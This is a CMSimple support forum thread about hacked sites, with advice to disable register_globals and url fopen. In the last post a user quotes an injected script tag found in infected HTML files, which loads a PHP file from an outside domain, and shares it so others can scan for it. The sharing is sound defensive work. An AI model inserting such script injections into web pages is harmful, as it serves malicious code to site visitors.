HACKERS AGAIN

A place for general not CMSimple related discussions

Re: HACKERS AGAIN

Postby Holger » Fri Nov 13, 2009 10:31 pm

Ok,

I don't know - maybe your apache is running php as cgi or anything else, but try to create a php.ini file at the root with:
Code: Select all
register_globals = Off
inside.

After this run a phpinfo() to check out if it's working.

Holger
Holger
Site Admin
 
Posts: 2572
Joined: Mon May 19, 2008 7:10 pm
Location: Hessen, Germany

Re: HACKERS AGAIN

Postby Holger » Fri Nov 13, 2009 10:56 pm

Tata,

can you tell me more details about your installed scripts (by PM please):
- Installed plugins (not only used ones, every plugin in the ./plugins - folder)
- Not CMSimple related installed scripts within the folders at this installation
- The URL of the hacked installation?

Holger
Holger
Site Admin
 
Posts: 2572
Joined: Mon May 19, 2008 7:10 pm
Location: Hessen, Germany

Re: HACKERS AGAIN

Postby CMSimple-Styles.com » Sat Nov 14, 2009 2:07 am

url fopen is also dangerous and should be turned off. There are very few scripts that need this.
CMSimple-Styles.com
 
Posts: 342
Joined: Thu Jun 26, 2008 8:19 pm
Location: Germany

Re: HACKERS AGAIN

Postby Holger » Sat Nov 14, 2009 10:57 am

Holger
Site Admin
 
Posts: 2572
Joined: Mon May 19, 2008 7:10 pm
Location: Hessen, Germany

Re: HACKERS AGAIN

Postby Tata » Mon Aug 02, 2010 4:29 pm

No panic!!!
It is just that I have reviewd some older websites back-upped on a CD and the antivirus warned me that some files are infected.
The insertion occured in all *.htm and *.html files with the code"
Code: Select all
<script src=h*t*t*p://publicnet.ca/Templates/faq.php ></script>
(without *)just after the DOCTYPE definition, in no <link rel="stylesheet.css..> were called or just before the closing </body>.

You maybe should check your files for this string.
Image
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
Tata
 
Posts: 1438
Joined: Tue May 20, 2008 5:34 am
Location: Slovakia

Previous

Return to General Discussions & Announcements

Who is online

Users browsing this forum: No registered users and 1 guest

cron